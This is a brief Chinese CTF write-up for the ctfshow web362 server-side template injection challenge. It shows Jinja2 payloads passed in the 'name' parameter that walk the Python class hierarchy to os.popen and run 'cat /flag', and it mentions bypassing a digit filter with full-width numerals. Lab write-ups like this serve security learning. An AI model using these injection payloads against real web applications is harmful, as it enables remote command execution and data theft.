当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- 【数学建模】—— 层次分析法(AHP)
- Nodejs安装
- In win10 system, all programs run as administrator by default
- Robocode tutorial 5 - enemy class
- Setting up keil environment of GD single chip microcomputer
- kettle庖丁解牛第17篇之文本文件输出
- Excel intercept text
- Matlab tips (6) comparison of seven filtering methods
- Daily CISSP certification common mistakes (April 14, 2022)
- Dynamically add default fusing rules to feign client based on sentinel + Nacos
猜你喜欢
Introduction to quantexa CDI syneo platform
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
Robocode Tutorial 4 - robocode's game physics
Nodejs installation
Solution to Chinese garbled code after reg file is imported into the registry
Resolves the interface method that allows annotation requests to be written in postman
【ACM】455. Distribute Biscuits (1. Give priority to big biscuits to big appetite; 2. Traverse two arrays with only one for loop (use subscript index -- to traverse another array))
MATLAB从入门到精通(二)
Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
随机推荐
WIN1 remote "this may be due to credssp encryption Oracle correction" solution
Solution to Chinese garbled code after reg file is imported into the registry
Interpretation and compilation of JVM
QT add external font ttf
Cygwin64 right click to add menu, and open cygwin64 here
Daily CISSP certification common mistakes (April 18, 2022)
Can filter
CISSP certified daily knowledge points (April 18, 2022)
ESP32 LVGL8. 1 - label (style 14)
Daily CISSP certification common mistakes (April 19, 2022)
Qt读写XML文件(含源码+注释)
Resolve the error Max virtual memory areas VM max_ map_ count [65530] is too low, increase to at least [262144]
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Test questions of daily safety network (February 2024)
CISSP certified daily knowledge points (April 14, 2022)
Rust: the output information of println is displayed during the unit test
QT error: no matching member function for call to ‘connect‘
C language to achieve 2048 small game direction merging logic
STM32 learning record 0008 - GPIO things 1
In shell programming, the shell file with relative path is referenced